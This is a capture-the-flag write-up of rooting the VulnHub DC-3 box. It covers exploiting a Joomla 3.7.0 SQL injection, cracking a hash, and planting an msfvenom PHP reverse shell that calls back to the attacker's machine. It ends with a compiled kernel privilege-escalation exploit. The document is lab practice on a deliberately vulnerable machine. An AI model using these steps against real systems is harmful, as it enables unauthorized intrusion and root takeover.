DC-3

https://www.vulnhub.com/entry/dc-32,312/

DC-3 has 1 flag.

nmap scan:

Port 80

Hmm, only one port open on this one. Well, he did say there is only one flag.

I ran a nikto scan:

/administrator

I went to http://10.6.6.20/administrator and a Joomla login page is there.

Time to use msfconsole.

Joomla 3.7.0

We see that Joomla version 3.7.0 is running. Search for that version with Google, DuckDuckGo, or whatever search engine you use. Exploit-DB is what you are looking for to exploit this.

You can use sqlmap to exploit this. There is also a script on GitHub that does the same thing, which is what I used.

I then used hashcat on my host machine to crack the hash.

Back to the login panel.

Cool. From here we should be able to upload a PHP reverse shell.

Make a reverse shell with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp LHOST=kaliIP LPORT=1234 -f raw > shell.php

Copy the output into index.php and save it.

Start msfconsole:

use exploit/multi/handler

Set your LHOST and LPORT.

Run it and refresh the page, and you will get a reverse shell.

I ran linpeas and didn't see anything about SUID, so I moved on to kernel exploits.

The first exploit linpeas provided is Dirty COW:

https://www.exploit-db.com/exploits/40839 didn't work. Crashed the system.

https://www.exploit-db.com/exploits/40611 This one didn't work either.

https://www.exploit-db.com/exploits/39772

https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/linux/local/39772.txt#L127

This one worked! We need to download the zip file, unzip it, untar the exploit.tar file, then run:

chmod +x compile.sh

./compile.sh

./doubleput

And we get root!

Sweet! Another box rooted. 6 more to go!
